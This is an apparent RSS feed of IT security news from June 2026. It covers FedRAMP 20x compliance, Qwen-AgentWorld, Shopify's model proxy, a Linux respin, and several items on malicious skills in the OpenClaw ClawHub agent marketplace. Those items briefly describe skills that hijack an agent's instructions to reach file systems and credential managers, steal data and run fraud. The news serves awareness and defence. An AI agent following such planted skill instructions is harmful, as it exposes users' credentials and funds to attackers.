<p>Because mature organizations are not the ones pretending problems don’t exist. They’re the ones capable of identifying issues quickly, exposing them honestly and improving continuously. That’s engineering. And maybe that’s where compliance finally starts becoming useful again.</p>



<h2 class="wp-block-heading">The future of trust</h2>



<p>For organizations participating in the current pilots, many of these concepts are already being tested through automation-first assessments, machine-readable evidence and continuous visibility.  <a href="https://www.fedramp.gov/20x/phases/2">FedRAMP 20x Phase 2</a>.</p>



<p>Because right now, most compliance still works like we’re printing MapQuest directions in 2004 and hoping nothing changes between point A and point B.</p>



<p>The environment changes constantly. Cloud infrastructure drifts, engineers move quickly, businesses evolve and threat actors adapt far faster than annual audits ever could.</p>



<p>Yet most assurance still relies on frozen snapshots and sampled evidence that were already out of date the second they were exported into a PDF.</p>



<p>That’s the bit I think FedRAMP 20x genuinely understands. This isn’t just about modernising audits. It’s about acknowledging that modern systems are living systems.</p>



<p>They are transient, constantly changing and impossible to understand properly through static evidence alone.</p>



<p>That’s why the move towards APIs, telemetry and machine-readable evidence matters so much.</p>



<p>Not because APIs are trendy.</p>



<p>Because they allow us to expose operational truth continuously instead of periodically reconstructing it after the fact.</p>



<p>And honestly, I think that changes the future of trust.</p>



<p>In five years, I don’t think organizations will primarily send customers PDFs and certifications.</p>



<p>I think they’ll expose assurance layers.</p>



<p>APIs.<br>Telemetry.<br>Machine-readable evidence.</p>



<p>Instead of saying: Here’s our SOC 2.</p>



<p>They’ll say: Here’s the operational data. Query it yourself.</p>



<p>Auditors won’t disappear, but I think their role changes significantly.</p>



<p>Less time auditing screenshots and selected controls. More time validating whether the underlying evidence pipelines are complete, accurate and trustworthy.</p>



<p>Modern audit becomes less about auditing controls and more about auditing data integrity.</p>



<p>And honestly?</p>



<p>That feels like a much healthier future than the one we’ve built today.</p>



<p>Because the future of trust probably isn’t polished dashboards and carefully curated evidence. It’s operational truth, and operational truth is messy. It contains drift, exceptions, bypasses, gaps and uncomfortable findings, but that’s exactly why it’s valuable.</p>



<h2 class="wp-block-heading">Stop rewarding the best storytellers</h2>



<p>Maybe that’s the biggest shift FedRAMP 20x is trying to create. Not better paperwork. Better visibility.</p>



<p>For years, we’ve rewarded organizations for telling the cleanest story. Maybe it’s finally time we reward them for exposing the truth instead. That’s the revolution FedRAMP 20x and GRC engineering are leading.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Skill Marketplace Exposes AI Agents to Supply Chain Malware and Financial Fraud]]></title>
<description><![CDATA[A wave of malicious skills targeting the OpenClaw AI agent marketplace has exposed a dangerous new frontier in software supply chain security. Attackers are using the ClawHub skill marketplace to push harmful code into AI agent environments, stealing data and running financial fraud schemes that ...]]></description>
<link>https://tsecurity.de/de/3623857/it-security-nachrichten/openclaw-skill-marketplace-exposes-ai-agents-to-supply-chain-malware-and-financial-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623857/it-security-nachrichten/openclaw-skill-marketplace-exposes-ai-agents-to-supply-chain-malware-and-financial-fraud/</guid>
<pubDate>Thu, 25 Jun 2026 10:52:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A wave of malicious skills targeting the OpenClaw AI agent marketplace has exposed a dangerous new frontier in software supply chain security. Attackers are using the ClawHub skill marketplace to push harmful code into AI agent environments, stealing data and running financial fraud schemes that traditional security tools failed to catch. OpenClaw is an AI […]</p>
<p>The post <a href="https://cybersecuritynews.com/openclaw-skill-marketplace-exposes-ai-agents/">OpenClaw Skill Marketplace Exposes AI Agents to Supply Chain Malware and Financial Fraud</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClawHub Malicious Skills Deliver macOS Infostealers Through Base64 curl-pipe-bash Droppers]]></title>
<description><![CDATA[OpenClaw’s dedicated AI agent marketplace, ClawHub, has become a prime target in the agentic software supply chain. Unlike traditional environments like npm or PyPI, malicious AI skills use semantic instruction hijacking to exploit an agent’s operational context, including file systems and creden...]]></description>
<link>https://tsecurity.de/de/3623560/it-security-nachrichten/clawhub-malicious-skills-deliver-macos-infostealers-through-base64-curl-pipe-bash-droppers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623560/it-security-nachrichten/clawhub-malicious-skills-deliver-macos-infostealers-through-base64-curl-pipe-bash-droppers/</guid>
<pubDate>Thu, 25 Jun 2026 08:38:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw’s dedicated AI agent marketplace, ClawHub, has become a prime target in the agentic software supply chain. Unlike traditional environments like npm or PyPI, malicious AI skills use semantic instruction hijacking to exploit an agent’s operational context, including file systems and credential managers. Following early attacks in February 2026, ClawHub integrated VirusTotal and ClawScan to […]</p>
<p>The post <a href="https://cyberpress.org/clawhub-skills-deliver-infostealers/">ClawHub Malicious Skills Deliver macOS Infostealers Through Base64 curl-pipe-bash Droppers</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Supply Chain Risk Lets Attackers Abuse AI Agent Authority for Unauthorized Actions]]></title>
<description><![CDATA[OpenClaw’s agentic marketplace, ClawHub, was designed to accelerate AI-driven workflows by letting third-party “skills” extend an AI agent’s capabilities. Those skills are markdown-driven packages with broad local access, and that design choice made ClawHub a critical and sensitive link in the em...]]></description>
<link>https://tsecurity.de/de/3623497/it-security-nachrichten/openclaw-supply-chain-risk-lets-attackers-abuse-ai-agent-authority-for-unauthorized-actions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623497/it-security-nachrichten/openclaw-supply-chain-risk-lets-attackers-abuse-ai-agent-authority-for-unauthorized-actions/</guid>
<pubDate>Thu, 25 Jun 2026 08:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw’s agentic marketplace, ClawHub, was designed to accelerate AI-driven workflows by letting third-party “skills” extend an AI agent’s capabilities. Those skills are markdown-driven packages with broad local access, and that design choice made ClawHub a critical and sensitive link in the emerging AI agent supply chain. Our deep technical review of activity between February and […]</p>
<p>The post <a href="https://gbhackers.com/openclaw-supply-chain-risk/">OpenClaw Supply Chain Risk Lets Attackers Abuse AI Agent Authority for Unauthorized Actions</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Supply Chain Risk Lets Attackers Abuse AI Agent Authority for Unauthorized Actions]]></title>
<description><![CDATA[OpenClaw’s agentic marketplace, ClawHub, was designed to accelerate AI-driven workflows by letting third-party “skills” extend an AI agent’s capabilities. Those skills are markdown-driven packages with broad local access, and that design choice made ClawHub a critical and sensitive link in…
Read ...]]></description>
<link>https://tsecurity.de/de/3623487/it-security-nachrichten/openclaw-supply-chain-risk-lets-attackers-abuse-ai-agent-authority-for-unauthorized-actions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623487/it-security-nachrichten/openclaw-supply-chain-risk-lets-attackers-abuse-ai-agent-authority-for-unauthorized-actions/</guid>
<pubDate>Thu, 25 Jun 2026 08:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw’s agentic marketplace, ClawHub, was designed to accelerate AI-driven workflows by letting third-party “skills” extend an AI agent’s capabilities. Those skills are markdown-driven packages with broad local access, and that design choice made ClawHub a critical and sensitive link in…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openclaw-supply-chain-risk-lets-attackers-abuse-ai-agent-authority-for-unauthorized-actions/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openclaw-supply-chain-risk-lets-attackers-abuse-ai-agent-authority-for-unauthorized-actions/">OpenClaw Supply Chain Risk Lets Attackers Abuse AI Agent Authority for Unauthorized Actions</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RoshanOS 4 – Improved MX Linux + KDE Build Aimed at Beginners Switching from Windows]]></title>
<description><![CDATA[Hi r/linux, Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason. Honest context on earlier versions: RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool.  RoshanOS 4 (rel...]]></description>
<link>https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</guid>
<pubDate>Thu, 25 Jun 2026 05:09:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi <a href="https://www.reddit.com/r/linux">r/linux</a>,</p> <p>Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason.</p> <p>Honest context on earlier versions:<br> RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool. </p> <p>RoshanOS 4 (released May 2026) is a full rebuild:</p> <ul> <li>Base: Current MX Linux (Debian Stable) with its solid tooling and long-term support</li> <li>Desktop: KDE Plasma</li> <li>Build process: Using MX Snapshot (MX Tools) </li> <li>Size: ~5.6 GB ISO</li> </ul> <h1>Notable changes &amp; features:</h1> <ul> <li>Much improved hardware portability thanks to proper remastering</li> <li>Pre-configured programming tryouts (Python, C/C++, Java, etc.)</li> <li>Screen edge gestures and other KDE workflow tweaks</li> <li>Pro edition with additional support layers for Windows and Android apps</li> <li>Comprehensive included documentation</li> </ul> <p>This is not positioned as a replacement for mainstream or minimalist distros. It’s my attempt at a polished, productive daily driver with a curated selection of packages on a reliable base.</p> <p>I’m posting mainly to get technical feedback from experienced users. If you try the live session, I’d appreciate notes on stability, hardware behavior, packaging choices, or anything that stands out (good or bad).</p> <p>Links:</p> <ul> <li>DistroWatch: <a href="https://distrowatch.com/roshanos">https://distrowatch.com/roshanos</a></li> </ul> <p>Thanks for any time you spend looking at it.</p> <p>(asakpke – RoshanTech)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/asakpke"> /u/asakpke </a> <br> <span><a href="https://i.redd.it/tyuzuwd0dc9h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uexta1/roshanos_4_improved_mx_linux_kde_build_aimed_at/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alibaba's model never trained as an agent — and improved agent performance across seven benchmarks]]></title>
<description><![CDATA[Alibaba's Qwen team released Qwen-AgentWorld on Tuesday — two models trained not to act inside agent environments, but to predict what those environments return. The release covers seven domains under a single architecture: MCP, Search, Terminal, Software Engineering, Android, Web, and OS. The re...]]></description>
<link>https://tsecurity.de/de/3622694/it-nachrichten/alibabas-model-never-trained-as-an-agent-and-improved-agent-performance-across-seven-benchmarks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622694/it-nachrichten/alibabas-model-never-trained-as-an-agent-and-improved-agent-performance-across-seven-benchmarks/</guid>
<pubDate>Wed, 24 Jun 2026 22:02:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Alibaba's Qwen team released Qwen-AgentWorld on Tuesday — two models trained not to act inside agent environments, but to predict what those environments return. The release covers seven domains under a single architecture: MCP, Search, Terminal, Software Engineering, Android, Web, and OS. </p><p>The release extends Alibaba's recent push into autonomous agents.<a href="https://venturebeat.com/technology/alibabas-proprietary-qwen3-7-max-can-run-for-35-hours-autonomously-and-supports-external-harnesses-like-anthropics-claude-code"> Qwen3.7-Max</a>, released in May, was built around a 35-hour autonomous execution capability. </p><p>That shift targets a ceiling teams training agents at scale run into directly. Real search engines surface whatever results exist, with no mechanism to inject controlled conditions. Live terminals do not allow injecting a low-disk-space condition on demand. Agent training is bounded by what production environments will surface, with no systematic way to expose the edge cases agents will need to handle but rarely encounter in training.</p><p>The research team trained agents inside the resulting simulator and found performance gains that exceeded what training against real environments alone produced. In a separate test, using world model training as a warm-up before agentic fine-tuning improved performance across seven benchmarks, including three the model had never seen during training.</p><p>The <a href="https://arxiv.org/pdf/2606.24597">paper accompanying the release</a> identified a gap in prior agent research. "We argue that world modeling is a crucial missing piece in the path to general agents."</p><h2>Qwen-AgentWorld trains on what environments return, not what agents should do</h2><p>Most agent models are trained to answer one question: given what the environment just showed me, what should I do next? Qwen-AgentWorld is trained to answer the inverse: given what the agent just did, what will the environment show next?</p><p>That reversal is the core of what the paper calls a language world model: instead of optimizing for action selection, the model learns to predict the next environment state across all seven domains under a single training objective. Prior work was narrower: <a href="https://arxiv.org/abs/2602.14721">WebWorld</a>, an earlier Qwen project from February, covered web environments only; <a href="https://arxiv.org/abs/2602.10090">Snowflake's Agent World Model</a>, published the same month, generates code-driven SQL-backed environments rather than training a model to predict states. Qwen-AgentWorld is the first to span seven domains in a single model, with environment modeling baked in from the earliest pretraining stage.</p><p>Alibaba trained both models in three stages on more than 10 million environment interaction trajectories from real agent runs. Stage one teaches the model how environments behave — file systems, terminal states, browser DOM changes, API responses. Stage two trains the model to reason through what comes next before predicting it. Stage three, reinforcement learning, tightens predictions using rule-based checks and open-ended quality scoring.</p><p>Both models are Mixture-of-Experts designs — only a fraction of parameters are active per token. The 35B model activates 3B; the 397B activates 17B. Both support 256K context windows. For GUI domains (Android, Web, and OS), the models work from textual accessibility trees and UI view hierarchies rather than screenshots.</p><p>The 35B model weights and AgentWorldBench are available under Apache 2.0; the 397B weights are not publicly released.</p><h2>The training results matter more than the benchmarks</h2><p>The benchmark scores show how accurately the models predict what environments return. The training results show what that prediction capability is actually worth for teams building agents — and those are the numbers that matter more.</p><p>According to the researchers, agents trained inside controlled simulation outperformed agents trained in real environments. Injecting targeted perturbations — partial responses that force extra agent steps, and edge cases real environments rarely surface — pushed MCPMark from 24.6 to 33.8. On Search, agents trained in entirely fictional worlds transferred to real search tasks, pushing WideSearch F1 Item from 34.02 to 50.31 on the open 35B model. A separate warm-up test showed that world model pretraining improved BFCL v4 from 62.29 to 71.25 and Claw-Eval from 53.60 to 64.88 with no agent-specific fine-tuning.</p><h2>Researchers flag the benchmark and the overfitting risk</h2><p>The paper drew immediate reaction from AI researchers on X. The concerns they raised map to what practitioners need to verify before acting on the findings.</p><p>On the training objective and transfer result, the assessment from one AI/ML researcher was direct. "Every other 'agent' model has been trained to act in environments," wrote<a href="https://x.com/drawais_ai/status/2069772845295849978?s=20"> @drawais_ai</a>, who has a PhD background and regularly breaks down AI papers. "Qwen flipped the question. They trained the model to predict the environment itself... That predictive knowledge then transfers to agent tasks even without any agent-specific fine-tuning." He identified the Controllable Sim RL result as "the receipt" for the claim that synthetic training can substitute for real-environment RL at scale, and flagged that three of the seven transfer benchmarks were entirely out of domain.</p><p>The benchmark margin drew immediate scrutiny. "AgentWorldBench is a benchmark Alibaba built and published in the same paper," wrote<a href="https://x.com/TheSignal_Desk/status/2069760788806475809?s=20"> @TheSignal_Desk</a>, who focuses on honest takes and key numbers in AI research. "They wrote the test, then topped it by 0.46."</p><p>The sim-RL methodology is the result<a href="https://x.com/limalemonnn/status/2069731795638067461?s=20"> @limalemonnn</a>, who builds production AI agents, identified as most in need of scrutiny before the headline claim gets quoted. "Sim-trained agents traditionally overfit to the simulator's quirks," they wrote. "If the world model is too clean, the agent learns the model, not the task." They pointed to the paper's holdout split as the section practitioners should read before acting on the numbers.</p><p>The overfitting concern has a partial answer in the data. The gap between uncontrolled Sim RL (MCPMark 24.6) and controlled Sim RL (MCPMark 33.8) suggests the gains depend substantially on the controllability mechanism, not simulation accuracy alone. The fictional-world Search result, where agents trained on invented environments transfer to real search tasks, is the paper's strongest evidence against the overfitting concern.</p><h2>What this means for teams building agentic pipelines</h2><p>For AI engineering teams building and scaling agentic pipelines, this work signals a meaningful shift in how agent capability gets built. Teams training agents at scale now have a third option between real-environment RL and static benchmarks: controlled simulation that injects the edge cases production won't surface.</p><p><b>Synthetic environments are a legitimate training layer. </b>Controlled simulation that injects conditions real environments won't produce is a complement to real-environment RL, not a shortcut around it.</p><p>What a model learns before agent training starts matters more than most pipelines account for. The warm-up finding — performance gains across unseen benchmarks with no agent-specific training — suggests environment grounding belongs earlier in development than current practice.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[So you've become a FOSS-Maintainer - Lessons learned from ~6 years of maintaining HedgeDoc (gpn24)]]></title>
<description><![CDATA[Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project almost immediately and learned FOSS maintenance the hard way. In this talk they'll present some lessons learned, so that others might have a better starting point.

Now th...]]></description>
<link>https://tsecurity.de/de/3622525/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622525/it-security-video/so-youve-become-a-foss-maintainer-lessons-learned-from-6-years-of-maintaining-hedgedoc-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:49:36 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Erik and Molly (among others) became HedgeDoc maintainers during the pandemic. They started a complete rewrite of the project almost immediately and learned FOSS maintenance the hard way. In this talk they'll present some lessons learned, so that others might have a better starting point.

Now that you are a FOSS maintainer (or are aiming to become one) several questions might come to your mind.

- What's maintaining like?
- What can I do to make my life easier?
- How do I manage the community?
- How do I keep the motivation high?
- How can I prevent burnout?
- What's the important stuff that suddenly needs to be handled?

We were at the same point, but after six years continuous maintenance of a reasonably big FOSS project, we've come to some answers that we'd like to share with you. Expect some honest answers, funny anecdotes and hard learned lessons.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/V9WEYQ/]]></content:encoded>
</item>
<item>
<title><![CDATA[‘If AI is to help build a better ​future, it must be honest about what it costs us now’: UN urges AI giants to reveal  full extent of environmental damage]]></title>
<description><![CDATA[AI companies should reveal the full cost on the environment, UN Chief says.]]></description>
<link>https://tsecurity.de/de/3622391/it-nachrichten/if-ai-is-to-help-build-a-better-future-it-must-be-honest-about-what-it-costs-us-now-un-urges-ai-giants-to-reveal-full-extent-of-environmental-damage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622391/it-nachrichten/if-ai-is-to-help-build-a-better-future-it-must-be-honest-about-what-it-costs-us-now-un-urges-ai-giants-to-reveal-full-extent-of-environmental-damage/</guid>
<pubDate>Wed, 24 Jun 2026 20:17:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI companies should reveal the full cost on the environment, UN Chief says.]]></content:encoded>
</item>
<item>
<title><![CDATA[Visa will offer an inside look at Project Glasswing and how the most powerful agentic models are changing enterprise security at VB Transform 2026]]></title>
<description><![CDATA[The security implications of advanced AI models were immediately clear to Visa’s technology team when they began testing Anthropic’s Mythos model.Just weeks into Project Glasswing, the team observed how quickly attackers can identify and weaponize vulnerabilities in critical code bases, creating ...]]></description>
<link>https://tsecurity.de/de/3622361/it-nachrichten/visa-will-offer-an-inside-look-at-project-glasswing-and-how-the-most-powerful-agentic-models-are-changing-enterprise-security-at-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622361/it-nachrichten/visa-will-offer-an-inside-look-at-project-glasswing-and-how-the-most-powerful-agentic-models-are-changing-enterprise-security-at-vb-transform-2026/</guid>
<pubDate>Wed, 24 Jun 2026 20:03:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The security implications of advanced AI models were immediately clear to Visa’s technology team when they began testing Anthropic’s <a href="https://venturebeat.com/security/mythos-detection-ceiling-security-teams-new-playbook">Mythos model</a>.</p><p>Just weeks into Project Glasswing, the team observed how quickly attackers can identify and weaponize vulnerabilities in critical code bases, creating security risks, explained Rajat Taneja, Visa’s president of technology, during a call to prepare for his session at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>, VentureBeat’s upcoming agentic AI event. </p><p>Visa is among the companies selected to test Anthropic’s upcoming model — a version of which was <a href="https://venturebeat.com/technology/anthropic-brings-mythos-to-the-masses-with-claude-fable-5-its-most-powerful-generally-available-model-ever">released</a> June 9 but abruptly disabled days later to comply with U.S. government directives.</p><p>The findings of Project Glasswing put a spotlight on widening enterprise security gaps and the vulnerabilities malicious actors can take advantage of. </p><p>"Security has always been important, but currently, in the age of AI, is going to be even more important because the attacks become autonomous,” Taneja told VentureBeat. “The defenses have to become autonomous. And we are not there. And there's an asymmetry there, which is a very big risk for the world."</p><p>Threat actors now have access to powerful AI agents that can work 24/7, “operating at a scale and speed that human teams cannot match, automating the tedious reconnaissance and exploitation phases of a cyberattack,” according to <a href="https://www.cisco.com/c/en/us/products/security/state-of-ai-security.html">Cisco’s State of AI Security 2026 report</a>. Amy Chang, Cisco’s head of AI threat intelligence and security research, will also be a speaker at VB Transform.</p><p>To mitigate these risks, Visa is building its own abstraction layers, observability, and data guardrails to secure its autonomous commerce frameworks. The payment services giant also rolled out an open‑source, AI-driven security framework that turns vulnerability discovery and remediation into a structured, repeatable pipeline. </p><p>Their work represents a shift enterprise IT teams must make to protect enterprise systems against threats posed by bad actors wielding autonomous agents. Taneja will share these insights and valuable technical details during his session at VB Transform, titled <b>Inside Project Glasswing and Mythos: Securing the agentic future today</b>, on July 15. </p><p>Other agentic AI security-focused sessions at VB Transform include:</p><ul><li><p><b>CrabTrap: How Brex built an open source proxy to secure OpenClaw’s critical flaws for everyone</b> with Brex co-founder and CEO Pedro Franceschi; </p></li><li><p><b>When AI Agents have wallets: Building the trust layer for autonomous B2B commerce </b>with Mastercard’s Chief AI and Data Officer, Greg Ulrich;</p></li><li><p><b>Expedia's blueprint for building autonomous agents for high-stakes transactional systems</b> with Chief AI and Data Officer Xavier Amatrain; and </p></li><li><p><b>Securing agentic AI: A playbook for permissioning, sandboxing, and human-in-the-loop controls</b>, a panel discussion with AI security leaders from Intuit, Box and Cisco.</p></li></ul><p><i>Interested in attending VB Transform 2026? Register </i><a href="https://web.cvent.com/event/27401f5a-f49e-46fc-90a3-eee31c2a4818/register"><i>here</i></a><i>. A select number of complimentary passes are also available to senior technology leaders. </i><a href="mailto:events@venturebeat.com"><i>Contact us </i></a><i>to get yours.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Shopify built an AI stack that doesn't care which models survive]]></title>
<description><![CDATA[Shopify built an LLM proxy that gives every engineer access to multiple AI providers — with automatic failover when any one of them goes down, changes, or disappears. When Claude Fable 5 shut down, Shopify's engineers didn't go into panic mode. The proxy shifted them to Claude Opus or GPT 5.5 aut...]]></description>
<link>https://tsecurity.de/de/3622360/it-nachrichten/how-shopify-built-an-ai-stack-that-doesnt-care-which-models-survive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622360/it-nachrichten/how-shopify-built-an-ai-stack-that-doesnt-care-which-models-survive/</guid>
<pubDate>Wed, 24 Jun 2026 20:03:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Shopify built an LLM proxy that gives every engineer access to multiple AI providers — with automatic failover when any one of them goes down, changes, or disappears. <a href="https://venturebeat.com/technology/anthropic-blocks-all-public-access-to-claude-fable-5-mythos-5-following-us-government-order-what-enterprises-should-do">When Claude Fable 5 shut down</a>, Shopify's engineers didn't go into panic mode. The proxy shifted them to Claude Opus or GPT 5.5 automatically, without interrupting their workflows.

“Fable looks amazing; we used it of course,” Farhan Thawar, Shopify’s head of engineering, <a href="https://www.youtube.com/watch?v=z9ZvM3qM-_w">says in a new VentureBeat Beyond the Pilot podcast</a>. “When a model comes and then it goes, or it could be as innocuous as an update, the proxy allows us to spray across the different providers,” Thawar says. </p><div></div><p>Shopify buys tokens in bulk and all users connect to models through its proxy, Thawar says. This gives his team access to reporting and failover; when there’s an availability issue with one provider, users can be “automatically, seamlessly” transferred to another. 

Enterprises can learn from this example and consider how a disruption might affect their business, Thawar says. At the very least, they should establish a solid backup plan. It’s important to have a system that allows for movement across models so enterprises are not “super tied” to a specific provider. 

Distillation is another important strategy. 

With distillation, a student model learns from a teacher model and typically becomes specialized in a narrower task. These small language models (SLMs) can be more beneficial than generalized, off-the-shelf models in some circumstances. For instance, Shopify’s flagship AI assistant, Sidekick, which performs numerous specialized subtasks for merchants so they can “remove toil” from their day-to-day. 

Using smaller distilled models can be faster and cheaper than more generalized models, Thawar says. In some cases they have proven to be 2x cheaper and faster; in more extreme cases 30x cheaper and faster, he says. 

But “it isn’t just about cost and latency, which are big; it’s about accuracy,” Thawar says. 

Engineers feed the UDP their teacher model, training data, evals, and a target model — say, Opus 4.8 distilling down to Qwen 3.5. The pipeline runs for about a day, then returns an evaluation showing what the fine-tuned model actually achieved on speed, cost, and accuracy for that subtask. If the tradeoff looks good, the engineer deploys it — no approval process required. Shopify's internal platform, Tangle, lets anyone visualize the pipeline as it runs.

Thawar says his “dream” is to eventually not give the distillation pipeline a target model at all. Instead, users could provide the teacher model with data and evals and the directive: ‘Based on your learnings over time, I want you to look at a different class of model, different sizes, different types, and you tell me what the right distillation target is.’

“Maybe we'll get surprised. Maybe it'll be such a small model it could run on a phone,” Thawar says. “Other times, maybe it comes back and says, ‘There isn't a way to distill this down to anything better than what we have at the frontier.’”</p><h2>Moving away from "AI reflexivity" to "AI leverage" </h2><p>Shopify users can apply whatever harness they want: Claude Code, Codex, Cursor, GitHub Copilot for VS Code. “We expose everyone to the different harnesses so they can get a feel for what may or may not work in their workflow.”

But the company also implemented a usage dashboard; this allows Thawar’s team to ask interesting questions around not just token spend, but: Who’s using the most expensive tokens? Who's spending more time on reasoning? What types of models are being used, and what disciplines and levels?

Regarding the "<a href="https://www.youtube.com/watch?v=7IcU0QBrYng">tokenmaxxing</a>" question, Shopify does have “circuit breakers” in place. If a user has a model running for a long time (say, 10 hours) and it’s consuming a lot of tokens, they will get pinged, “Did you mean to spend this?” 

As Thawar explains, sometimes the reply is “Oh, absolutely.” Other times it’s: ‘Whoa, I didn't know that was running in the background. I totally forgot about it. I'd rather stop it now.’ 

The ultimate goal, as Thawar describes it, is to move from “AI reflexivity” to “AI leverage,” and get people to really think deeply about where they can benefit most from AI in their workflows. 

Listen to the full podcast to hear more about: </p><ul><li><p>Shopify’s philosophy of building infrastructure before features. As Thawar puts it: “We've always built more infra. We will continue to always build more infra.”</p></li><li><p>How Shopify’s internal AI agent, River, creates a “substrate of information” across the company.</p></li><li><p>How Thawar's OpenClaw agent figured out he was traveling from his calendar — and what that moment told him about where agents are actually headed.</p></li></ul><p><b>You can also listen and subscribe to </b><a href="https://beyondthepilot.ubpages.com/"><b>Beyond the Pilot</b></a><b> on </b><a href="https://open.spotify.com/show/4Zti73yb4hmiTNa7pEYls4"><b>Spotify</b></a><b>, </b><a href="https://podcasts.apple.com/us/podcast/beyond-the-pilot-enterprise-ai-in-action/id1839285239"><b>Apple</b></a><b> or wherever you get your podcasts.</b></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[More Malicious OpenClaw Skills Threaten AI Supply Chain]]></title>
<description><![CDATA[OpenClaw removed five packages from ClawHub, its skills marketplace, that bypassed security checks even though they included infostealers and other threats.]]></description>
<link>https://tsecurity.de/de/3622273/it-security-nachrichten/more-malicious-openclaw-skills-threaten-ai-supply-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622273/it-security-nachrichten/more-malicious-openclaw-skills-threaten-ai-supply-chain/</guid>
<pubDate>Wed, 24 Jun 2026 19:23:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenClaw removed five packages from ClawHub, its skills marketplace, that bypassed security checks even though they included infostealers and other threats.]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI readiness gap: Why networks matter more than ever]]></title>
<description><![CDATA[Ask enterprise leaders about AI and you’re likely to get a wave of excited responses. BCG research found that two-thirds of global CEOs put accelerating AI among their top three priorities, with CIOs under pressure to turn that ambition into business value.



But there’s a problem. Many enterpri...]]></description>
<link>https://tsecurity.de/de/3621530/it-nachrichten/the-ai-readiness-gap-why-networks-matter-more-than-ever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621530/it-nachrichten/the-ai-readiness-gap-why-networks-matter-more-than-ever/</guid>
<pubDate>Wed, 24 Jun 2026 15:32:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ask enterprise leaders about AI and you’re likely to get a wave of excited responses. <a href="https://www.bcg.com/publications/2026/as-ai-investments-surge-ceos-take-the-lead" target="_blank" rel="sponsored">BCG research found that two-thirds of global CEOs put accelerating AI among their top three priorities</a>, with CIOs under pressure to turn that ambition into business value.</p>



